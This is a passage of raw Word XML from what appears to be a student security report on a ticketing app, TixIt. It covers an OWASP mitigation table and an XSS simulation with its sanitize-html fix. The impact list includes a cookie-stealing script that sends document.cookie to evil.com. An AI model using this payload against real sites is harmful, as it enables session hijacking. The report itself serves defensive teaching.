              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A09: Security Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42916B0A" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Partial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FC43EEA" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>to add in future</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="0D1B52B9" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F84CB79" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A10: Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547ECF67" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FE7725E" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31B09D96" w14:textId="77777777" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4BC16D" w14:textId="2244CD12" w:rsidR="003A327C" w:rsidRPr="004E318F" w:rsidRDefault="003A327C" w:rsidP="00EE11A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TixIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> implements </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mitigations across at least 7 OWASP categories</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which exceeds expectations for a student project</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E2D05" w14:textId="3CA97156" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc214584806"/>
      <w:bookmarkStart w:id="12" w:name="_Exploit_Simulations_&amp;"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Exploit Simulations &amp; Fixes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="67E94D1B" w14:textId="4003A573" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Below </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> all attack simulations performed on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TixIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, including payloads and screenshots (placeholders) and detailed technical explanations</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3485CB" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc214584807"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2C7C040C" w14:textId="28FEBAAE" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack Payload Attempted</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('Hacked!</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A39FC3" w14:textId="3FC83B16" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Where Injected</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ticket title</w:t>
      </w:r>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Category</w:t>
      </w:r>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>City</w:t>
      </w:r>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Place</w:t>
      </w:r>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734C2A6" w14:textId="69131CC2" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expected Malicious Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906B844" w14:textId="2F77BA14" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Session token theft via:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://evil.com?c='+document.cookie)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7C47F" w14:textId="649AC22C" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UI defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D097BA1" w14:textId="28B44AD1" w:rsidR="00F13D01" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>persistent script execution in all users' browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0A3C6" w14:textId="66B7A889" w:rsidR="00BE7BE3" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Actual Observed Outcome (Before Fix)</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload appears as-is in DB and would execute on frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8D437" w14:textId="683DBE98" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix — sanitize-html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1F65B" w14:textId="4194AE6D" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Applied to user-generated fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB4D9A0" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">description: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>sanitizeHtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>value.description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> || "", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D9D6D" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>allowedTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D3152" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>allowedAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39DEA6" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
